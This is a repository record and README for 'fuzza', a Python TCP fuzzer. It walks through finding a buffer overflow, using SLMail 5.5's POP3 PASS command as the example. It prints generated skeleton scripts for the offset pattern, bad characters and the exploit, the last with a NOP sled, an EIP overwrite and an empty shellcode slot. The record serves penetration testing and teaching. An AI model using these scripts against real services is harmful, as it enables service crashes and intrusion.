{"id":15647234,"url":"https://github.com/cytopia/fuzza","last_synced_at":"2025-04-30T11:15:16.133Z","repository":{"id":57432721,"uuid":"234789287","full_name":"cytopia/fuzza","owner":"cytopia","description":"Customizable TCP fuzzing tool to test for remote buffer overflows.","archived":false,"fork":false,"pushed_at":"2020-04-16T06:59:37.000Z","size":106,"stargazers_count":48,"open_issues_count":0,"forks_count":8,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-30T15:36:47.066Z","etag":null,"topics":["buffer-overflow","buffer-overflow-attack","cytopia-sec","fuzzer","fuzzers","fuzzing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cytopia.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-01-18T19:52:31.000Z","updated_at":"2025-02-27T07:39:39.000Z","dependencies_parsed_at":"2022-09-19T07:00:25.485Z","dependency_job_id":null,"html_url":"https://github.com/cytopia/fuzza","commit_stats":null,"previous_names":[],"tags_count":8,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cytopia%2Ffuzza/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cytopia","download_url":"https://codeload.github.com/cytopia/fuzza/tar.gz/refs/heads/master","host":{"name":"
GitHub","url":"https://github.com","kind":"github","repositories_count":251687596,"owners_count":21627597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["buffer-overflow","buffer-overflow-attack","cytopia-sec","fuzzer","fuzzers","fuzzing"],"created_at":"2024-10-03T12:17:35.974Z","updated_at":"2025-04-30T11:15:16.092Z","avatar_url":"https://github.com/cytopia.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# fuzza\n\n[![](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![PyPI](https://img.shields.io/pypi/v/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Status](https://img.shields.io/pypi/status/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Format](https://img.shields.io/pypi/format/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - Implementation](https://img.shields.io/pypi/implementation/fuzza)](https://pypi.org/project/fuzza/)\n[![PyPI - License](https://img.shields.io/pypi/l/fuzza)](https://pypi.org/project/fuzza/)\n\n[![Build Status](https://github.com/cytopia/fuzza/workflows/linting/badge.svg)](https://github.com/cytopia/fuzza/actions?workflow=linting)\n[![Build Status](https://github.com/cytopia/fuzza/workflows/testing/badge.svg)](https://github.com/cytopia/fuzza/actions?workflow=testing)\n[![Build Status](https://github.com/cytopia/fuzza/workflows/building/badge.svg)](https://github.com/cytopia/fuzza/actions?workflow=building)\n\nCustomizable TCP fuzzing tool to 
test for remote buffer overflows.\n\n`fuzza` is able to send and receive any initial commands prior to sending the payload as well as\nsending any post commands after the payload has been sent. In order to replicate and triage the\nbuffer overflow, `fuzza` can be used to generate custom Python scripts for attack, badchars and\nfinding the EIP based on your command line arguments. See examples for more details.\n\n\n## :tada: Installation\n```bash\npip install fuzza\n```\n\n\n## :star: Features\n\n* Works similarly to [generic_send_tcp](https://www.codeproject.com/articles/19307/generic-tcp-ip-client-server), but instructions are specified via command line arguments\n* Has an [expect](https://linux.die.net/man/1/expect)-like feature to wait for a specific response which also supports regex\n* Generates custom Python scripts based on your command line arguments to triage the overflow\n* Works with Python2 and Python3\n\n\n## :computer: Usage\n```bash\n$ fuzza --help\n\nusage: fuzza [options] host port\n       fuzza --help\n       fuzza --version\n\nCustomizable TCP fuzzing tool to test for remote buffer overflows.\n\nIt works in two different modes: normal and generate. Normal mode will send your payload\nto a remote endpoint and increase the payload size each round in order to try to crash the\nservice. The generate mode however will generate three easy to use python scripts to\nfurther triage any potential buffer overflow manually.\n\npositional arguments:\n  host                  IP or hostname to connect to.\n  port                  Port to connect to.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -v, --version         Show version information,\n  -c char, --char char  Buffer character to send as payload. Default: \"A\"\n  -p str, --prefix str  Prefix string to prepend to buffer. Empty by default.\n  -s str, --suffix str  Suffix string to append to buffer. 
Empty by default.\n  -l int, --length int  Initial length to concat buffer string with x*char.\n                        When using the '-g' option to generate reproducible attack scripts set this\n                        to the value at which the crash occured in order to pre-populate the\n                        generated scripts. Default: 100\n  -m int, --multiply int\n                        Round multiplier to concat buffer string with x*char every round.\n                        Default: 100\n  -i str, --init str    If specified, initializes communication before sending the payload in the\n                        form '\u003csend\u003e:\u003cexpect\u003e,\u003csend\u003e:\u003cexpect\u003e,...'. Where \u003csend\u003e is the data to be\n                        sent to the server and \u003cexpect\u003e is the answer to be received from the\n                        server.  Either one of \u003csend\u003e or \u003cexpect\u003e can be omitted if you expect\n                        something without having sent data yet or need to send something for which\n                        there will not be an answer. Multiple \u003csend\u003e:\u003cexpect\u003e are supported and\n                        must be separated by a comma.\n                        Regex supported for \u003cexpect\u003e part.\n  -e str, --exit str    If specified, finalizes communication after sending the payload in the\n                        form '\u003csend\u003e:\u003cexpect\u003e,\u003csend\u003e:\u003cexpect\u003e,...'. Where \u003csend\u003e is the data to be\n                        sent to the server and \u003cexpect\u003e is the answer to be received from the\n                        server.  Either one of \u003csend\u003e or \u003cexpect\u003e can be omitted if you expect\n                        something without having sent data yet or need to send something for\n                        which there will not be an answer. 
Multiple \u003csend\u003e:\u003cexpect\u003e are supported\n                        and must be separated by a comma.\n                        Regex supported for \u003cexpect\u003e part.\n  -t float, --timeout float\n                        Timeout in sec for receiving data before declaring the endpoint as crashed.\n                        Default: 30.0\n  -d float, --delay float\n                        Delay in seconds between each round. Default: 1.0\n  -g dir, --generate dir\n                        Generate custom python scripts based on your command line arguments\n                        to reproduce and triage the overflow. Requires a directory to be\n                        specified where to save the scripts to.\n\nexample:\n\n  The following example illustrates how to use the initial communication by:\n      1. Expecting the POP3 server banner\n      2. Sending 'USER bob'\n      3. Expecting a welcome message\n  Additionally before sending the fuzzing characters, it is prepended with 'PASS ',\n  so that the actuall fuzzing can be done on the password:\n     1. Prefix payload with 'PASS '\n     2. Send payload\n  Lastly in order to also close the connection the '-e' opton is used\n  (which works exactly as '-i') in order to send data after the payload.\n     1. Expect any response from password payload\n     2. Terminate the connection via QUIT\n     3. 
Do not expect a follow up response\n  $ fuzza -i ':.*POP3.*,USER bob\\r\\n:.*welcome.*' -e ':.*,QUIT:' -p 'PASS ' -s '\\r\\n'\n\nVisit https://github.com/cytopia/fuzza for more examples.\n```\n\n\n## :zap: Modes\n\n### Normal\n\nIn normal mode you can communicate with a network service and specify at which stage of the\ncommunication to send an increasing buffer.\n\nThe following example sends an ever-increasing buffer to host.example.tld at port 4444:\n```bash\n$ fuzza host.example.tld 4444\n```\n\nThe following example connects to an IMAP service, waits for its banner and tries to overflow\nthe password value of `a LOGIN \u003cuser\u003e \u003cpass\u003e`:\n```bash\n$ fuzza -i ':.*' -p 'a LOGIN bob ' -s '\\r\\n' host.example.tld 143\n```\n\n### Generate\n\nIf you have found a potential buffer overflow, it is time to generate your triage scripts with the\nsame parameters used for finding the overflow.\n\nIn the following example you have found a buffer overflow on host.example.tld at port 4444 at\n300 characters and can start to generate your files:\n```bash\n$ fuzza host.example.tld 4444 -l 300 -g output/\n```\n\nThe scripts will be pre-populated with any command line arguments specified.\n\n\n#### `pattern.py`\n\nThis is the first script you will want to use. It is already pre-populated with characters from\n`pattern_create.rb` at length 300. There is no modification required. Simply start your debugger\nof choice, watch your application and run `pattern.py` without any arguments. 
Whatever ends up in\nyour EIP can be thrown into `pattern_offset.rb` and you have the length of the overflow.\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n    \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n    # Python2: Unescape control chars\n    try:\n        return data.decode('string_escape')\n    except AttributeError:\n        pass\n    except UnicodeDecodeError:\n        pass\n    # Python3: Unescape control chars and convert to byte\n    try:\n        return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n    except UnicodeDecodeError:\n        pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\npattern = (\n    \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9\"\n    \"Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"\n    \"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9\"\n    \"Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9\"\n)  # 300 bytes from pattern_create.rb\n\nprint('Trying to send %s bytes unique chars...' 
% (str(len(pattern))))\ntry:\n    s.connect(('host.example.tld', 4444))\n    s.send(str2b('' + pattern + ''))\n    print('done')\nexcept:\n    print('Could not connect')\ns.close()\n```\n\nThe next thing you will want to do is to adjust the `len_overflow` variable in `badchars.py` and\n`attack.py` with the value you found via `pattern_offset.rb`.\n\n\n#### `badchars.py`\n\nThis script will help you to identify any characters that are squashed or truncated in memory, i.e.\nthe bad characters that cannot be used for the payload.\n\nBefore running it, remember to adjust the `len_overflow` variable.\n\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n    \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n    # Python2: Unescape control chars\n    try:\n        return data.decode('string_escape')\n    except AttributeError:\n        pass\n    except UnicodeDecodeError:\n        pass\n    # Python3: Unescape control chars and convert to byte\n    try:\n        return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n    except UnicodeDecodeError:\n        pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_overflow = 300      # Use pattern_create.rb and pattern_offset.rb to find exact offset\neip          = \"B\"*4     # Ignore for badchar detection\nbadchars = (\n    \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\"\n    \"\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\"\n    \"\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\"\n    \"\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\"\n    \"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\"\n    \"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\"\n    
\"\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\"\n    \"\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\"\n    \"\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\"\n    \"\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\"\n    \"\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\"\n    \"\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\"\n    \"\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\"\n    \"\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\"\n    \"\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\"\n    \"\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\"\n)\n\nbuffer = \"A\"*len_overflow + eip + badchars\n\nprint('Trying to send %s bytes buffer...' % (str(len(buffer))))\ntry:\n    s.connect(('host.example.tld', 4444))\n    s.send(str2b('' + buffer + ''))\n    print('done')\nexcept:\n    print('Could not connect')\ns.close()\n```\n\n\n#### `attack.py`\n\nIn this script everything comes together and you can:\n1. Adjust the overflow length\n2. Adjust the nop sled length\n3. Set EIP address\n4. Add shellcode\n5. 
Add padding\n\nThere is also not much to write, as you just need to fill variables and most other stuff is simply\nauto-calculated.\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n    \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n    # Python2: Unescape control chars\n    try:\n        return data.decode('string_escape')\n    except AttributeError:\n        pass\n    except UnicodeDecodeError:\n        pass\n    # Python3: Unescape control chars and convert to byte\n    try:\n        return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n    except UnicodeDecodeError:\n        pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_total    = 300                # Start at len_overflow and try out how much can be overwritten\nlen_overflow = 296                # Use pattern_create.rb and pattern_offset.rb to find exact offset\nlen_nop_sled = 0                   # Add x bytes of nops before shellcode for shellcode decoding\neip          = \"\\x42\\x42\\x42\\x42\"  # Change this (Keep in mind to put address in reverse order)\nshellcode    = \"\"\n\npadding = \"C\"*(len_total - len_overflow - len(str(eip)) - len_nop_sled - len(shellcode))\nbuffer  = \"A\"*len_overflow + eip + \"\\x90\"*len_nop_sled + shellcode + padding\n\nprint('Trying to send %s bytes buffer...' 
% (str(len(buffer))))\ntry:\n    s.connect(('host.example.tld', 4444))\n    s.send(str2b('' + buffer + ''))\n    print('done')\nexcept:\n    print('Could not connect')\ns.close()\n```\n\n\n## :bulb: Examples\n\n### SLMail 5.5 Buffer overflow\n\n#### Overview\n\n* [CVE-2003-0264](https://www.cvedetails.com/cve/CVE-2003-0264/) - buffer overflow in password.\n\nTo see how the raw communication works, have a look at the following netcat snippet:\n```bash\n$ nc mail.example.tld 110\n+OK POP3 server mail.example.tld ready \u003c00001.544405549@mail.example.tld\u003e\nUSER test\n+OK test welcome here\nPASS LongPassword\n-ERR unable to lock mailbox\nQUIT\n```\n\n#### Find potential overflow length\n\nIn order to fuzz the password, all previous communication must have happened. By using `fuzza`,\nthis can be achieved with the `-i` argument to specify initial data to be sent and received.\nAdditionally we also want to close the connection after sending the payload (if possible).\nThis can be achieved with the `-e` option, which works exactly like `-i`.\n```bash\n$ fuzza -i ':.*OK POP3.*,USER test\\r\\n:.*test welcome.*' -p 'PASS ' -s '\\r\\n' -e ':.*,QUIT\\r\\n:' mail.example.tld 110\n\n------------------------------------------------------------\nA * 100\n------------------------------------------------------------\nInit Awaiting:   \".*OK POP3.*\"\nInit Received:   \"+OK POP3 server mail.example.tld ready \u003c00005.544236132@mail.example.tld\u003e\"\nInit Sending:    \"USER test\\r\\n\"\nInit Awaiting:   \"test welcome\"\nInit Received:   \"+OK test welcome here\"\nSending Payload: \"PASS \" + \"A\"*100 + \"\\r\\n\"\nExit Awaiting:   \".*\"\nExit Received:   \"-ERR unable to lock mailbox\"\nExit Sending:    \"QUIT\\r\\n\"\n...\n\n------------------------------------------------------------\nA * 2700\n------------------------------------------------------------\nInit Awaiting:   \".*OK POP3.*\"\nInit Received:   \"+OK POP3 server mail.example.tld ready 
\u003c00005.544236132@mail.example.tld\u003e\"\nInit Sending:    \"USER test\\r\\n\"\nInit Awaiting:   \"test welcome\"\nInit Received:   \"+OK test welcome here\"\nSending Payload: \"PASS \" + \"A\"*2700 + \"\\r\\n\"\nExit Awaiting:   \".*\"\n\nRemote service (most likely) crashed at 2700 bytes of \"A\"\nPayload sent:\nPASS AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n```\n\n#### Generate triaging scripts\n\nNow that you know the application is potentially vulnerable at or before 2700 bytes, you will have\nto try to replicate and triage the buffer overflow. In order to do so, you can use `fuzza` to\nautomatically generate triaging scripts based on your current arguments and findings.\n\nUse the same arguments as before, add the initial length of 2700 bytes (`-l 2700`) and specify\nan output directory (`-g \u003cpath\u003e`):\n```bash\n$ fuzza -i ':.*OK POP3.*,USER test\\r\\n:.*test welcome.*' -p 'PASS ' -s '\\r\\n' -e ':.*,QUIT\\r\\n:' -l 2700 -g out/ mail.example.tld 110\n```\n`fuzza` will then generate three files in `out/` directory based on your command line arguments:\n\n1. `attack.py`  - used to replicate and triage buffer overflow\n2. `pattern.py` - used to find offset for EIP\n3. 
`badchars.py` - used to find any bad characters for the exploit shellcode\n\nBased on the above specified command line arguments, the triaging scripts will look as follows:\n\n**`attack.py`**\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n    \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n    # Python2: Unescape control chars\n    try:\n        return data.decode('string_escape')\n    except AttributeError:\n        pass\n    except UnicodeDecodeError:\n        pass\n    # Python3: Unescape control chars and convert to byte\n    try:\n        return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n    except UnicodeDecodeError:\n        pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_total    = 2700                # Start at len_overflow and try out how much can be overwritten\nlen_overflow = 2696                # Use pattern_create.rb and pattern_offset.rb to find exact offset\nlen_nop_sled = 0                   # Add x bytes of nops before shellcode for shellcode decoding\neip          = \"\\x42\\x42\\x42\\x42\"  # Change this (Keep in mind to put address in reverse order)\nshellcode    = \"\"\n\npadding = \"C\"*(len_total - len_overflow - len(str(eip)) - len_nop_sled - len(shellcode))\nbuffer  = \"A\"*len_overflow + eip + \"\\x90\"*len_nop_sled + shellcode + padding\n\nprint('Trying to send %s bytes buffer...' 
% (str(len(buffer))))\ntry:\n    s.connect(('mail.example.tld', 110))\n    s.recv(1024)\n    s.send(str2b('USER test\\r\\n'))\n    s.recv(1024)\n    s.send(str2b('PASS ' + buffer + '\\r\\n'))\n    s.recv(1024)\n    s.send(str2b('QUIT\\r\\n'))\n    print('done')\nexcept:\n    print('Could not connect')\ns.close()\n```\n\n**`pattern.py`**\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n    \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n    # Python2: Unescape control chars\n    try:\n        return data.decode('string_escape')\n    except AttributeError:\n        pass\n    except UnicodeDecodeError:\n        pass\n    # Python3: Unescape control chars and convert to byte\n    try:\n        return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n    except UnicodeDecodeError:\n        pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\npattern = (\n    \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9\"\n    \"Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9\"\n    \"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9\"\n    \"Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9\"\n    \"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9\"\n    \"Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9\"\n    \"As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9\"\n    \"Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9\"\n    \"Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9\"\n    
\"Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9\"\n    \"Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9\"\n    \"Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9\"\n    \"Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9\"\n    \"Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9\"\n    \"Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9\"\n    \"Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9\"\n    \"Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9\"\n    \"Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9\"\n    \"Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9\"\n    \"Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9\"\n    \"Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9\"\n    \"Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9\"\n    \"Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9\"\n    \"Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9\"\n    \"Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9\"\n    \"Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9\"\n    \"Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9\"\n    \"Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9\"\n    \"Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9\"\n    
\"Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9\"\n)  # 2700 bytes from pattern_create.rb\n\nprint('Trying to send %s bytes unique chars...' % (str(len(pattern))))\ntry:\n    s.connect(('mail.example.tld', 110))\n    s.recv(1024)\n    s.send(str2b('USER test\\r\\n'))\n    s.recv(1024)\n    s.send(str2b('PASS ' + pattern + '\\r\\n'))\n    s.recv(1024)\n    s.send(str2b('QUIT\\r\\n'))\n    print('done')\nexcept:\n    print('Could not connect')\ns.close()\n```\n\n**`badchars.py`**\n```python\n#!/usr/bin/env python\n\"\"\"fuzza autogenerated.\"\"\"\n\nfrom __future__ import print_function\nimport socket\n\ndef str2b(data):\n    \"\"\"Unescape P2/P3 and convert to bytes if Python3.\"\"\"\n    # Python2: Unescape control chars\n    try:\n        return data.decode('string_escape')\n    except AttributeError:\n        pass\n    except UnicodeDecodeError:\n        pass\n    # Python3: Unescape control chars and convert to byte\n    try:\n        return data.encode(\"utf-8\").decode('unicode-escape').encode(\"latin1\")\n    except UnicodeDecodeError:\n        pass\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nlen_overflow = 2700      # Use pattern_create.rb and pattern_offset.rb to find exact offset\neip          = \"B\"*4     # Ignore for badchar detection\nbadchars = (\n    \"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\"\n    